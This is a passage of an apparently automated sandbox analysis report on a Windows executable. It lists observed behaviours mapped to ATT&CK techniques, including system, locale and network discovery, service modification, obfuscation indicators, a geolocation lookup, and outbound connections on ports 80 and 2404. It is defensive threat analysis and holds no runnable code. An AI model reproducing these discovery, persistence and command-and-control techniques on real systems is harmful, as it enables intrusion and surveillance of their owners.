"\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4690264'}\" (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetLocaleInfoA\" with parameter \"2048\" - (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f69601000000008e00000074f69601fefffffffcf59601cf001d77d6001d77c1a18e768e0000004700000074f6960100000000d0f596010000000038f69601 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000650000000080d8766c00b4f4960104641c7738016500e0631c7789a08e760000000000006500e0766c006dd13f7562d6ad956caef6750000000000000000f0010000c4006500a82f65000100000000006500500165000c000000e0766c00a82f6500020000001800000030000000ff07000000000000000000000300000054f49601ff07000000000000000000000e00000e7f070000c0754775e0e36a0000000000c075477570f4960179da3f7500000000a82f6500c8f49601dbd23f75e0766c00c4006500cad6ad95211f0000ff2b1c772da18e760000000004026500 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000098e6f40000008f002d4804013ce4f401ff2b1c7798e6f40195e1187715460400feffffff435c1c7750591c7734020000400200008a058f0088058f001000000080000000ff2b1c7789b1ec7620a3a06cac016500000065000100000050f6670019007f000600000000d17073ac0165000000650088058f001a007a000600000006000000bcee1c77d86f650000008f00200000001b0075000000000080f56a00c86c6500e86d650030bd6c009071650000008f0030e5f40180f56a00b0e6f40195e118772d480400feffffffff2b1c779a2a1c7720a3a06c10a3a06c00000000 (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"IsWow64Process\" with parameter \"4744\" - (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-189", "relevance": 5, "name": "Calls an APIs used to retrieve process information", "description": "Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d]", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetWindowTextW\" (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetWindowTextW\" with parameter \"Task Switching\" - (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /json.gp\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-72", "type": 7, "relevance": 3, "name": "GETs files from a webserver (HTTPS)", "description": "GET /json.gp HTTP/1.1\nHost: geoplugin.net\nCache-Control: no-cache\n", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"InternetOpenA\" (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"InternetOpenW\" (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-118", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the URL data", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"InternetReadFile\" with parameter 65535 (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"netCache\" in header \"GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"AUTODIALDLL\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPV6DOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\LINKAGE\"; Key: \"BIND\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-193", "relevance": 5, "name": "Calls an API used to change the configuration parameters of a service", "description": "Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" has resource with unusual entropy \"RT_RCDATA:7.842818139567792\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"SleepConditionVariableCS\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNEL32.DLL)\n Found string \"FlsAlloc\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"InitOnceExecuteOnce\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNEL32.DLL)\n Found string \"CreateEventExW\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSemaphoreW\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNEL32.DLL)\n Found string \"CreateSemaphoreExW\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolTimer\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolWait\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSymbolicLinkW\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNEL32.DLL)\n Found string \"GetTickCount64\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"GetFileInformationByHandleEx\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNEL32.DLL)\n Found string \"SetFileInformationByHandle\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"SleepConditionVariableSRW\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNEL32.DLL)\n Found string \"CreateThreadpoolWork\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"GetLocaleInfoEx\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"EnumSystemLocalesEx\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNELBASE.DLL)\n Found string \"GetDateFormatEx\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNEL32.DLL)\n Found string \"GetTimeFormatEx\" (Source: 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d, API is part of module: KERNEL32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" has a section named \".gfids\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" has section name .text with entropy \"6.6273936921798455\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" has section name .reloc with entropy \"6.723768218094163\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"C:\\24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" connects to <IPv4> on port 2404 (TCP)\n Process \"C:\\24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" connects to <IPv4> on port 80 (TCP); Domain: 